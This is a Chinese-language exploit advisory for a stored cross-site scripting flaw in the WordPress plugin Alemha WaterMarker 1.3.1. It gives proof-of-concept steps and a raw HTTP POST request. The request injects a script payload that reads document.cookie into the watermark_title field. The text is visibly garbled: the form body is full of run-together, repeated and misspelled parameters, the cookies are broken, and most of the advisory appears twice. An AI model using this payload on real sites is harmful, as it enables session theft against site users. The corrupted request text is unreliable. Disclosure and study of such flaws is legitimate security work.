#利用标题: WordPress 插件 Alemha WaterMarker 1.3.1 - 存储型跨站脚本 (XSS)
#Date: 2024年3月22日
#利用作者: erdemstar
#vendor: https://wordpress.com/
#版本: 1.3.1
#概念证明:
1. 点击“添加新水印”，然后在水印文本（watermark_title 字段）中输入 XSS 载荷。
2. 该载荷被存储，并在任何打开此水印编辑页面的用户的浏览器中执行；载荷以 `">` 开头，说明该值被未经转义地回显到 HTML 属性中。
#易受攻击的参数: watermark_title
#POC VIDEO:
#request:
POST /wp-admin/post.php HTTP/2
Host: erdemstar.local
cookie: wordpress_sec_dd86dc85a236e19160e960e96f4ec4b56b38=攻击者%7C1711297520%7cvlz1u8etd9hww06666cnci Uhagumsk3wltvpskghvmtzp%7C50573CB574C70A41A241CB9F1F1F1F1E3FF22F539F539FC8630599F2503D02503D0202A6C1A7E7E678; wordpress_test_cookie=wp%20cookie%20check; wp_lang=en_us; WP-SETTINGS TIME-4=1711124335; wordpress_logged_in_dd86dc85a236e19160e960e96f4ec4b56b38=攻击者%7C1711297520%7cvlz1u8etd9hww066c nciuhagumsk3wltvpskghvmtzp%7CDAE14D9D9AA7F0C4DF03783BB2B2B2B21A5B3D6A63D8C3E1AE1AE1AE1AE1AE1AE1DDDDA689C59595862; WP-SETTINGS TIME-5=1711124723
Content-Length: 1460
Upgrade-Insecure-Requests: 1
Origin: https://erdemstar.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://erdemstar.local/wp-admin/post-new.php?
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0,i
_wpnonce=99A1D1E63A_WP_HTTP_REFERER=%2FWP-ADMIN%2FPOST-NEW.PHP%3FPOST_TYPE%3DWaterMarkser_id=5Action=5Action=5Action=EditPostoriginalAction=EditPostoriginalAction=EditPostPostPostPostPostPostPostPostPost_Author=5post _ towspe_typerigigina l_post_status=auto-draftreferredby=https%3A%2f%2f%2ferdemstar.local%2fwp-admin%2fedit.php% 3FPOST_TYPE%3Dwatermark_wp_original_http_referer=https%3A%2F%2f%2ferDemstar.local%2FWP-ADM在%2feDit.php%3FPOST_TYPE%%%3DwaterMarkauto_draft=1post_id=35meta-box-order-nonce=ea875c0c6fclosedpostboxesnonce=d29be25ad88post_title=Smamplepermalinknonce=1eppermalinknonce=1EED33AWWAW PREVPERVPERVEFPEREVPEFEFERVEFPEREVPERVEFPEREVPEFEFEFEFEFEFEFEFEFEFEFERVEFPEREVPEREVERDED=hidden_post_status=draftpost_status=draftthidden_post_password=sidend_post_visibility=publicvisibility=publicPost_pass_password=mm=03JJ=22AA=2024HH=2024HH=16mn=16mn=25SS=25SS=23HIDDIDER_MM=03CUR_MM=03CUR_MM=03HIDDER_JJ=22CUR_JJ=22HIDDER_AA=2024CUR_AA=2024HIDDER_HH=16CUR_HH=16HIDDER_MN=25CUR_MN=25CUR_MN=25original_publish=25original_publish=PublishPublish=PublishPublish=PublishTax_Input%5BCATEGIOR ustom_meta_box_nonce=d1322f94a0watermark_title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eimg_sizes%5B%5D=thumbnailimg_sizes%5B%5D=mediumimg_sizes%5B%5D=large img_sizes%5b%5D=fulftxt_type=arial.ttfrgb=38%2C1%2C24TXT_SIZE=8color=%23260118Rotation=100position=100position=topdestance_x=mesaure_x=mesaure_x=pxpadding=pxpadding=pxpadding=yesaure_y=mesaure_y=mesaure_y=pxback ==255%2C0%2c0bg_destance_x=bg_padding=color_bg=%23ff0000image=img_rotation=img_opicity=100img_position=topimg_size=topimg_size=4img_destance_x=img_mesaure_mesaure_x=pxim_x=pximg_padeur=pximg_padding=imgmesa=imgmesa
#Date: 2024年3月22日
#利用作者: erdemstar
#vendor: https://wordpress.com/
#版本: 1.3.1
#概念证明:
1. 点击“添加新水印”，然后在水印文本（watermark_title 字段）中输入 XSS 载荷。
2. 该载荷被存储，并在任何打开此水印编辑页面的用户的浏览器中执行；载荷以 `">` 开头，说明该值被未经转义地回显到 HTML 属性中。
#易受攻击的参数: watermark_title
#POC VIDEO:
POST /wp-admin/post.php HTTP/2
Host: erdemstar.local
cookie: wordpress_sec_dd86dc85a236e19160e960e96f4ec4b56b38=攻击者%7C1711297520%7cvlz1u8etd9hww06666cnci Uhagumsk3wltvpskghvmtzp%7C50573CB574C70A41A241CB9F1F1F1F1E3FF22F539F539FC8630599F2503D02503D0202A6C1A7E7E678; wordpress_test_cookie=wp%20cookie%20check; wp_lang=en_us; WP-SETTINGS TIME-4=1711124335; wordpress_logged_in_dd86dc85a236e19160e960e96f4ec4b56b38=攻击者%7C1711297520%7cvlz1u8etd9hww066c nciuhagumsk3wltvpskghvmtzp%7CDAE14D9D9AA7F0C4DF03783BB2B2B2B21A5B3D6A63D8C3E1AE1AE1AE1AE1AE1AE1DDDDA689C59595862; WP-SETTINGS TIME-5=1711124723
Content-Length: 1460
Upgrade-Insecure-Requests: 1
Origin: https://erdemstar.local
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://erdemstar.local/wp-admin/post-new.php?
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0,i
_wpnonce=99A1D1E63A_WP_HTTP_REFERER=%2FWP-ADMIN%2FPOST-NEW.PHP%3FPOST_TYPE%3DWaterMarkser_id=5Action=5Action=5Action=EditPostoriginalAction=EditPostoriginalAction=EditPostPostPostPostPostPostPostPostPost_Author=5post _ towspe_typerigigina l_post_status=auto-draftreferredby=https%3A%2f%2f%2ferdemstar.local%2fwp-admin%2fedit.php% 3FPOST_TYPE%3Dwatermark_wp_original_http_referer=https%3A%2F%2f%2ferDemstar.local%2FWP-ADM在%2feDit.php%3FPOST_TYPE%%%3DwaterMarkauto_draft=1post_id=35meta-box-order-nonce=ea875c0c6fclosedpostboxesnonce=d29be25ad88post_title=Smamplepermalinknonce=1eppermalinknonce=1EED33AWWAW PREVPERVPERVEFPEREVPEFEFERVEFPEREVPERVEFPEREVPEFEFEFEFEFEFEFEFEFEFEFERVEFPEREVPEREVERDED=hidden_post_status=draftpost_status=draftthidden_post_password=sidend_post_visibility=publicvisibility=publicPost_pass_password=mm=03JJ=22AA=2024HH=2024HH=16mn=16mn=25SS=25SS=23HIDDIDER_MM=03CUR_MM=03CUR_MM=03HIDDER_JJ=22CUR_JJ=22HIDDER_AA=2024CUR_AA=2024HIDDER_HH=16CUR_HH=16HIDDER_MN=25CUR_MN=25CUR_MN=25original_publish=25original_publish=PublishPublish=PublishPublish=PublishTax_Input%5BCATEGIOR ustom_meta_box_nonce=d1322f94a0watermark_title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Eimg_sizes%5B%5D=thumbnailimg_sizes%5B%5D=mediumimg_sizes%5B%5D=large img_sizes%5b%5D=fulftxt_type=arial.ttfrgb=38%2C1%2C24TXT_SIZE=8color=%23260118Rotation=100position=100position=topdestance_x=mesaure_x=mesaure_x=pxpadding=pxpadding=pxpadding=yesaure_y=mesaure_y=mesaure_y=pxback ==255%2C0%2c0bg_destance_x=bg_padding=color_bg=%23ff0000image=img_rotation=img_opicity=100img_position=topimg_size=topimg_size=4img_destance_x=img_mesaure_mesaure_x=pxim_x=pximg_padeur=pximg_padding=imgmesa=imgmesa